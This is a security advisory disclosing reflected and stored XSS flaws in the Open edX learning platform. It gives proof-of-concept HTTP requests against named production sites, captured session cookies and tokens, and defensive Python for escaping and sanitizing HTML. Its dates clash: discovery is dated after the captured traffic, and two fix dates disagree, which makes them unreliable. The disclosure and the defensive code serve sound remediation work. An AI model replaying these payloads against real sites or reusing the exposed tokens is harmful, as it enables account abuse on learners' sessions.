ITAS SECURITY TEAM FOUND MULTIPLE VULNERABILITIES IN THE OPEN EDX LEARNING PLATFORM
The ITAS Security Team has found several security vulnerabilities in Open edX, the open-source online education platform behind edX, which was founded by Harvard and MIT in 2012. It is used by many international organizations, including Microsoft, IBM, Harvard University and Stanford University. During security testing for clients running Open edX, the ITAS Security Team discovered a number of vulnerabilities in the Open edX source code (Hawthorn.2, released 06/29/2018). They include stored cross-site scripting and reflected cross-site scripting, which an attacker could use against the users of any site running the affected version.
After ITAS notified edX of the vulnerabilities, edX examined the report and acknowledged a total of 4 CAT-1 security issues. ITAS continued to assist with the fix by pointing out remaining vulnerabilities in a second round. To express their appreciation, edX offered the ITAS team rewards worth $600 USD.
From edX's response to ITAS: "Thank you so much for your hard work to make edx.org more secure for its millions of learners worldwide. As a non-profit open-source company we really appreciate you taking the time to find and disclose these issues to us directly."
Cross-site scripting, also known as XSS, is A7 in the OWASP Top 10 2017. With an XSS vulnerability an attacker runs script in the victim's browser within the application's origin: hijacking the session, performing actions as the logged-in user, or staging further attacks from the page. Note that in the captured responses below the session cookie (prod-edx-sessionid) is set with the HttpOnly flag, so a payload cannot read it through document.cookie; script running in the page can still send authenticated requests on the victim's behalf.
From our observation, every online education site running the affected version is exploitable in the same way; examples are listed below.
- https://courses.edx.org
- https://openedx.microsoft.com
- https://openedx.gse.harvard.edu
- https://lagunita.stanford.edu
- https://lms.mitx.mit.edu
- https://university.redislab.com
- https://openedx.open.ac.uk/
- https://campus.gov.il
- https://demo.edunext.io/
1. Application Information
Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27
2. Vulnerabilities Information
a. Template – URL Cross Site Scripting
Vulnerability name: URL Cross Site Scripting (reflected, via the URL path)
Affected URL : https://openedx-site.com/template/{PAYLOAD}
Parameter name : (none; the payload is the final path segment, i.e. the template name)
Parameter Type : GET (URL path)
Sample payload: <script>alert('XSS')</script>
Condition to attack: none stated (the proof-of-concept request below is sent without a session cookie)
Vulnerable file: openedx/core/djangoapps/debug/views.py
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615
Proof of concept
Request
GET /template/<script>alert('XSS')</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close
Missing template <script>alert('XSS')</script>
Video (Demonstration in openedx.microsoft.com)
b. Xblock – Reflected Cross Site Scripting
Vulnerability name: Reflected Cross Site Scripting
Affected URL : https://courses.edx.org/xblock/{USAGE_ID}?view={PAYLOAD}
Parameter name : view
Parameter Type : GET
Sample payload: <script>alert('XSS')</script>
Condition to attack: none stated (the proof-of-concept request below is sent without a session cookie)
Vulnerable file: lms/djangoapps/courseware/views/views.py
Vulnerable function: render_xblock
Fixed link: https://github.com/edx/edx-platform/pull/19517
Proof of concept
Request
GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert("XSS")</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 400 Bad Request
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close
Rendering of the xblock view '<script>alert('XSS')</script>' is not supported.
Video (Demonstration in openedx.microsoft.com)
c. Certificate – Reflected Cross Site Scripting
Vulnerability name: Reflected Cross-site Scripting
Affected URL : http://openedx-site.com/certificates/search/?user={PAYLOAD}
Parameter name : user
Parameter Type : GET
Sample payload: <script>alert('XSS')</script>
Condition to attack: Required staff role or higher
Vulnerable file: lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates
Fixed link: https://github.com/edx/edx-platform/pull/19519
Proof of concept
Request
GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: openedx.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=YexdtVBq17ovoP4JX4z0JVJprr7Jwt8m5ftnkPEztOkctN0BjVUMtWcDxcID3Fbc; experiments_is_enterprise=false; openedx-language-preference=en; edxloggedin=true; sessionid="1|ud7b2zkplcv2zzrbkkk06wtkq6ced7tp|qtpnFD16krkG|IjQ2MTA5N2NmNGEwOWFkNjNjNzJjNDg1MGQ4NDE5MTc1YTNiYTAwYTYzYmQ2NDg0NjgwYWQ3NDk4OTVhNDFmYzQi:1gYpH7:wa4qHQbmWjRbERxcmREcFCezcec"; edx-user-info="{\"username\": \"staff\"\054 \"version\": 1\054 \"enrollmentStatusHash\": \"09d498ab1dd69884525f4cdfa9cca6a6\"\054 \"header_urls\": {\"learner_profile\": \"http://192.168.1.238/u/staff\"\054 \"resume_block\": \"http://192.168.1.238/dashboard\"\054 \"logout\": \"http://192.168.1.238/logout\"\054 \"account_settings\": \"http://192.168.1.238/account/settings\"}}"
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/
user '<script>alert('XSS')</script>' does not exist
Video (Demonstration in openedx.local)
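Sections a, b and c are the same bug three times: a view builds an error message by interpolating the request's input into a text/html body without escaping it, so whatever markup was sent comes back as markup, even though the status codes are 404 and 400. The following is an added illustration in plain Python, not code from edx-platform: it models the three captured messages, shows the hardened form beside them (assumption: escaping with the stdlib html.escape, which behaves like django.utils.html.escape; the linked upstream PRs are not reproduced here), and adds a small classifier that tells an escaped reflection apart from an unescaped one, which is what to look for when re-testing a patched site. The function names are chosen for this example.

```python
"""Added example, not code from edx-platform: the reflected-XSS sink shared by
sections a, b and c, modelled in plain Python, with the hardened form beside it
and a helper to classify what a re-test response actually reflected."""
import html

# Message templates copied from the captured responses in sections a, b and c.
TEMPLATES = {
    "template": "Missing template {value}",
    "xblock": "Rendering of the xblock view '{value}' is not supported.",
    "certificate": "user '{value}' does not exist",
}

# Sample payload from the advisory.
PAYLOAD = "<script>alert('XSS')</script>"


def build_error_vulnerable(sink: str, value: str) -> str:
    """Vulnerable pattern: untrusted input interpolated straight into a
    text/html response body (what the captured responses show)."""
    return TEMPLATES[sink].format(value=value)


def build_error_fixed(sink: str, value: str) -> str:
    """Hardened pattern: HTML-escape the untrusted value first.  html.escape
    is the stdlib equivalent of django.utils.html.escape (assumption: this is
    the kind of change the upstream fixes make; see the PR links above)."""
    return TEMPLATES[sink].format(value=html.escape(value, quote=True))


def classify_reflection(body: str, payload: str) -> str:
    """Classify how a response body reflects the payload:
    'unescaped' - the markup came back verbatim (exploitable in an HTML body)
    'escaped'   - it came back entity-encoded (&lt;script&gt;...), i.e. fixed
    'absent'    - the input was not reflected at all"""
    if payload in body:
        return "unescaped"
    if (html.escape(payload, quote=True) in body
            or html.escape(payload, quote=False) in body):
        return "escaped"
    return "absent"


def is_exploitable(content_type: str, body: str, payload: str) -> bool:
    """A verbatim reflection only executes if the browser renders the body as
    HTML; all three captures are served as 'text/html; charset=utf-8'."""
    is_html = content_type.split(";")[0].strip().lower() == "text/html"
    return is_html and classify_reflection(body, payload) == "unescaped"


if __name__ == "__main__":
    for sink in TEMPLATES:
        vuln = build_error_vulnerable(sink, PAYLOAD)
        fixed = build_error_fixed(sink, PAYLOAD)
        print(sink, classify_reflection(vuln, PAYLOAD), "->",
              classify_reflection(fixed, PAYLOAD))
        print("  before:", vuln)
        print("  after: ", fixed)
```

When re-testing after an upgrade, send the same payload and look for the entity-encoded form in the body; a 4xx status by itself proves nothing, since all three vulnerable responses above were already 4xx.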
d. Wiki – Stored Cross Site Scripting
Vulnerability name: Stored Cross Site Scripting
Affected URL : https://openedx-site.com/courses/{Course_id}/course_wiki
Parameter name : content
Parameter Type : POST
Sample payload: <script>alert('XSS')</script>
Condition to attack: registered user
Vulnerable file: lms/djangoapps/course_wiki/views.py
Vulnerable function: course_wiki_redirect
Fixed link: https://github.com/edx/edx-platform/pull/20633/files
Steps to reproduce: log in as a student user and follow the steps below.
Step 1: Open the course wiki by appending course_wiki to the course URL (whether or not the course has a wiki; e.g. https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki).
Step 2: Click the Edit button, put the XSS payload (<script>alert('XSS')</script>) into the wiki content and save it.
Step 3: The payload executes for anyone who views https://courses.edx.org/wiki/{Course-id}/ (e.g. https://courses.edx.org/wiki/course-v1:AdelaideX+ProgramX+3T2018/).
Proof of concept
Request 1
GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid="1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0"; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.[...]; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info="{\"username\": \"studentdemo1\"\054 \"version\": 1\054 \"enrollmentStatusHash\": \"02c23d94693a6636ea722152eab98136\"\054 \"header_urls\": {\"learner_profile\": \"https://courses.edx.org/u/studentdemo1\"\054 \"resume_block\": \"https://courses.edx.org/dashboard\"\054 \"logout\": \"https://courses.edx.org/logout\"\054 \"account_settings\": \"https://courses.edx.org/account/settings\"}}"
Upgrade-Insecure-Requests: 1
Response 1
HTTP/1.1 302 Found
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close
Request 2
POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=---------------------------112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid="1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0"; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.[...]; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info="{\"username\": \"studentdemo1\"\054 \"version\": 1\054 \"enrollmentStatusHash\": \"02c23d94693a6636ea722152eab98136\"\054 \"header_urls\": {\"learner_profile\": \"https://courses.edx.org/u/studentdemo1\"\054 \"resume_block\": \"https://courses.edx.org/dashboard\"\054 \"logout\": \"https://courses.edx.org/logout\"\054 \"account_settings\": \"https://courses.edx.org/account/settings\"}}"; AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255
Upgrade-Insecure-Requests: 1

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="csrfmiddlewaretoken"

CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="title"

Programming for Data Science
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="content"

This is the wiki for **AdelaideX**'s _Programming for Data Science_.
<script>alert('XSS')</script>
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="summary"

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="current_revision"

89992
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="save"

1
-----------------------------112257516914770264881620708143--
Response 2
HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid="1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY"; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close
Request 3
GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: prod-edx-sessionid="1|7ahalk3pygy48xh6l70e6j4ia96n4zet|IkblSszTjSXs|ImI5Y2FjMmY2YjZhOTk0NGVhZjBhMmE4NDFkMDA0ZDYwNDRiZDk5OTcyZTgzNGEzZjBiYmQ2MzIxYTg1OTRkNjAi:1gWg0X:V-pHtUuxjSFjVnSWN2DHssjuAYI"; csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; __cfduid=de755c9ba6493ba36d514c937c9f5528b1544526347; optimizelyEndUserId=oeu1544526349200r0.564235344454921; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%22de57a2d3-488b-4ada-960a-c6af0997df5b%22; experiments_is_enterprise=false; ki_t=1544526815310%3B1544526815310%3B1544526855356%3B1%3B2; edxloggedin=true; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.[...]; edx-jwt-cookie-signature=kHy194pQ77QiK-gwvWsvIZvBvCHfRrJedvWHyS3SvONFx-ui8sXhZ2vZ0crVVjl-LHw9No30E_GSTmSOIiZ6Szu9MJm-0eFlOVLXziztwS7XcmfF8U2yBcLck40MuqlxLAIwAxjSDSbMNCJE0oKeNzUrFqUnTJuRYcqHmXiIHiK07hTQosEFMOXThirlJqTPFndnRUC3ZLHEsR6zlIcjW94hv_8VX3Ghf-nHGAq7t-E3b8EZgMOWw52vVKoL0xDLHSMphKVceX9w2GPzKSVUop3S5WK8yPJO3F5Zsjtj8F_ll7zeY-r-FTBqBo1MuRaQAdmQhCl0NIujNTsEEa-GKg; prod-edx-language-preference=en; edx-jwt-refresh-cookie=QplV797j5qcL5sqThFjeA4o8BwHQFN; prod-edx-user-info="{\"username\": \"studentdemo1\"\054 \"version\": 1\054 \"enrollmentStatusHash\": \"02c23d94693a6636ea722152eab98136\"\054 \"header_urls\": {\"learner_profile\": \"https://courses.edx.org/u/studentdemo1\"\054 \"resume_block\": \"https://courses.edx.org/dashboard\"\054 \"logout\": \"https://courses.edx.org/logout\"\054 \"account_settings\": \"https://courses.edx.org/account/settings\"}}"; prod-edx-cookie-policy-viewed=true
Upgrade-Insecure-Requests: 1
Response 3
HTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close
……….SNIPPET……….
<div class=”wiki-article”>
<p>This is the wiki for <strong>AdelaideX</strong>’s <em>Programming for Data Science</em>.
<script>alert('XSS')</script></p>
</div>
……….SNIPPET……….
Video (Demonstration in demo.edunext.io)
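The stored case differs from the three reflected ones: the payload is saved as wiki markdown and rendered for every later visitor, so the fix belongs where the rendered HTML is produced, not in a single view. As an added illustration that is not edx-platform's own fix (PR 20633 is linked above and is not reproduced here), the following stdlib-only Python sanitizer applies an allowlist to rendered wiki HTML: tags outside the list are dropped, script and style elements are removed together with their contents, and only a few attributes with safe URL schemes survive. It is run on the article HTML captured in Response 3 above; the class and function names are chosen for this example.

```python
"""Added example, not edx-platform code: an allowlist sanitizer for rendered
wiki HTML, the mitigation for the stored XSS in section d.  stdlib only."""
import html
from html.parser import HTMLParser

# Policy: everything not listed here is dropped (allowlist, not blocklist).
ALLOWED_TAGS = {"p", "br", "strong", "em", "a", "ul", "ol", "li", "code", "pre",
                "blockquote", "h1", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}          # tag and everything inside it
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:", "/", "#")


class AllowlistSanitizer(HTMLParser):
    """Re-emits only allowed tags/attributes; text is always re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0      # > 0 while inside <script>/<style>
        self.open_tags = []      # allowed tags we emitted and must close

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return               # e.g. <img onerror=...>: the tag vanishes
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue         # drops on* handlers, style, srcdoc, ...
            value = value or ""
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                continue         # javascript:, data:, vbscript: ...
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:    # close back to the matching tag
            t = self.open_tags.pop()
            self.out.append("</%s>" % t)
            if t == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:  # text inside <script> is discarded
            self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:    # close anything the input left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_html(fragment):
    """Return `fragment` with the allowlist policy applied."""
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return p.result()


# Constructed sample: the wiki article HTML captured in Response 3 above.
WIKI_ARTICLE = ("<p>This is the wiki for <strong>AdelaideX</strong>'s "
                "<em>Programming for Data Science</em>.\n"
                "<script>alert('XSS')</script></p>")

if __name__ == "__main__":
    print(sanitize_html(WIKI_ARTICLE))
    print(sanitize_html('<img src=x onerror=alert(1)>'
                        '<a href="javascript:alert(1)">x</a>'))
```

For production use a maintained sanitizer (bleach, nh3) rather than a hand-written parser; the block shows the policy, which is what matters: an allowlist stops the `<script>` in this report as well as `<img onerror>` and `javascript:` links that a blocklist of `<script>` alone would miss.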
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of these instructions. The author prohibits any malicious use of security-related information or exploits by the author or elsewhere.
Disclosure Timeline
+ 25/12/2018: security vulnerabilities found
+ 26/12/2018: vulnerabilities reported to the edX Security Team
+ 15/01/2019: edX Security Team confirms the vulnerabilities
+ 18/01/2019: edX releases fixed version
+ 18/04/2019: public disclosure